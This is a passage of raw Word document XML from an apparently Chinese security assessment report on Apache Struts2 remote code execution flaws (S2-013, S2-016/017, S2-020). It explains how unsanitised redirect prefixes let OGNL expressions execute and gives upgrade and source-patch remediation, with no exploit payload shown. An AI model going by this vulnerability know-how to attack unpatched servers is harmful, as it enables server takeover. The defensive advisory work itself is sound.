      </w:r>
      <w:r w:rsidR="007D01FD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是在</w:t>
      </w:r>
      <w:r w:rsidR="007D01FD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">struts </w:t>
      </w:r>
      <w:r w:rsidR="007D01FD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="007D01FD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebWork</w:t>
      </w:r>
      <w:r w:rsidR="007D01FD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的技术基础上进行了合并的全新的框架。</w:t>
      </w:r>
      <w:r w:rsidR="007D01FD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="007D01FD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞类型分为两种，一种是使用缩写的导航参数前缀时的远程代码执行漏洞，另一种是使用缩写的重定向参数前缀时的开放式重定向漏洞。</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程命令执行，属于高危安全</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞，可使黑客取得网站服务器的权限。这里我们重点描述相关远程命令执行漏洞。</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DefaultActionMapper</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持一种方法，可以使用”</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>action:</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redirect:</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redirectAction:</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”对输入信息进行处理，从而改变前缀参数，这样操作的目的是方便表单中的操作。在</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.3.15.1</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本以前的</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，没有对”</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>action:</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redirect:</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redirectAction:</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”等进行处理，导致</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ongl</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式可以被执行，如</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s2-020</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的漏洞中，利用</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ognl</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class.xx</w:t>
      </w:r>
      <w:r w:rsidR="00C7197B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方式来遍历属性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB77F83" w14:textId="77777777" w:rsidR="005C51DF" w:rsidRPr="00B90E5F" w:rsidRDefault="005C51DF" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A3BECD" w14:textId="28768DC7" w:rsidR="005C51DF" w:rsidRPr="00B90E5F" w:rsidRDefault="00877413" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352536C1" w14:textId="1BF92430" w:rsidR="00D3688B" w:rsidRPr="00B90E5F" w:rsidRDefault="005C51DF" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00D3688B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议及时更新</w:t>
      </w:r>
      <w:r w:rsidR="00D3688B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidR="00911CBC" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本到最新，如果暂时不方便</w:t>
      </w:r>
      <w:r w:rsidR="00D3688B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新，则提供以下方案进行修复：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB25B55" w14:textId="1302ABBE" w:rsidR="00D3688B" w:rsidRPr="00B90E5F" w:rsidRDefault="00911CBC" w:rsidP="002E176A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除升级</w:t>
      </w:r>
      <w:r w:rsidR="00D3688B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外：</w:t>
      </w:r>
      <w:r w:rsidR="00D3688B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="00D3688B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00D3688B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(S2-013) </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00D3688B" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>临时解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99B340" w14:textId="4804A177" w:rsidR="00911CBC" w:rsidRPr="00B90E5F" w:rsidRDefault="00911CBC" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改文件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">org.apache.struts2.views.util.DefaultUrlHelper </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>281</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>284</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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1319F2" w:rsidRPr="00B90E5F" w14:paraId="5F6AA69B" w14:textId="77777777" w:rsidTr="00936DFE">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96A7EB"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private String translateVariable(String input) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63B4BF5B"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ValueStack valueStack = ServletActionContext.getContext().getValueStack(); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="281DEFD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return TextParseUtil.translateVariables(input, valueStack); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F8790AF"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC6412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hint="eastAsia"/>
              </w:rPr>
              <w:t>修改成</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06BF0649"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rivate String translateVariable(String input) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6960D511"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return input; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42DAD002"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="198665E6" w14:textId="77777777" w:rsidR="00D3688B" w:rsidRPr="00B90E5F" w:rsidRDefault="00D3688B" w:rsidP="002E176A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2 s2-016/s2-017</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞官网漏洞说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D22ECB" w14:textId="23FD14BD" w:rsidR="001319F2" w:rsidRPr="00B90E5F" w:rsidRDefault="003F781E" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://struts.apache.org/release/2.3.x/docs/s2-016.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001319F2" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决方案</w:t>
      </w:r>
      <w:r w:rsidR="001319F2" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001319F2" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidR="001319F2" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts 2.1.8.1</w:t>
      </w:r>
      <w:r w:rsidR="001319F2" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本为例</w:t>
      </w:r>
      <w:r w:rsidR="001319F2" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001319F2" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F59DA2B" w14:textId="57C91B96" w:rsidR="001319F2" w:rsidRPr="00B90E5F" w:rsidRDefault="001319F2"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下载</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">struts 2.1.8.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts-2.1.8.1-src.zip</w:t>
      </w:r>
      <w:r w:rsidR="00564413" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251374D8" w14:textId="1A8E9641" w:rsidR="001319F2" w:rsidRPr="00B90E5F" w:rsidRDefault="001319F2"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eclipse</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>war</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76765869" w14:textId="6B26F083" w:rsidR="001319F2" w:rsidRPr="00B90E5F" w:rsidRDefault="001319F2"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lastRenderedPageBreak/>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts-2.1.8.1-src.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内的源码拖到项目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A9B19" w14:textId="4FE5B492" w:rsidR="001319F2" w:rsidRPr="00B90E5F" w:rsidRDefault="001319F2"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找到对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts-2.1.8.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
